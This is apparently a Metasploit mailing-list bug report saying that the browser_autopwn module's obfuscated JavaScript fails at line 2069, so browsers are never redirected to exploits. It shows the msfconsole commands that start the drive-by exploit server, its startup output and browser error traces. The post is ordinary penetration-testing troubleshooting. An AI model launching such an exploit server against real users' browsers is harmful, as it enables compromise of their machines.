browser_autopwn broken in current version of Metasploit?

[Arnar Gunnarsson <addi () addi org>]

There seems to be some issue with the Javascript obfuscation feature
in the browser_autopwn module in Metasploit v3.8.0-dev (r13067).

I'm able to start the module, but when I browse to the URL of the
browser_autopwn server I'm not being redirected to the actual
exploits.

msf > use auxiliary/server/browser_autopwn
msf > set LHOST 192.168.43.140
msf > set URIPATH /
msf > run

[*] Starting exploit modules on host 192.168.43.140...
[*] ---

[.... snip]

[*] --- Done, found 21 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.43.140:8080/
[*] Server started.

Now I navigate to http://192.168.43.140:8080/ using any of the three
major browsers and they all result in the same Javascript error (line
2069).
This happens before browser_autopwn identifies the OS and browser type
and redirect the browser to a specific explot.

The offending line (line 2069)
NrkYCIMtz = nkenXYUAjhMoyZ.encode(NrkYCIMtz);


* Information from Firefox's Error Console:
---------------
Error: nkenXYUAjhMoyZ.encode is not a function
Source File: http://192.168.43.140:8080/

* Information from Chrome's Developer Tools:
---------------
Uncaught TypeError: Object #<Object> has no method 'encode'     :8080/:2069
oBeiS
                      :8080/:2069
lNFkLUahB
                  :8080/:2075
(anonymous function)
              :8080/:2076
onload
                      :8080/:2077

* Information from IE8's Developer Tools
---------------
Object doesn't support this property or method
192.168.43.140:8080, line 2069 character 3


It is also woth mentioning that all the exploits have started
correctly and I can even point a IE7 instance to a specific IE exploit
URL that succeeds. But the redirect from URIPATH
(http://192.168.43.140:8080/) to the specific IE exploit URL does not
happen.


- Addi
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework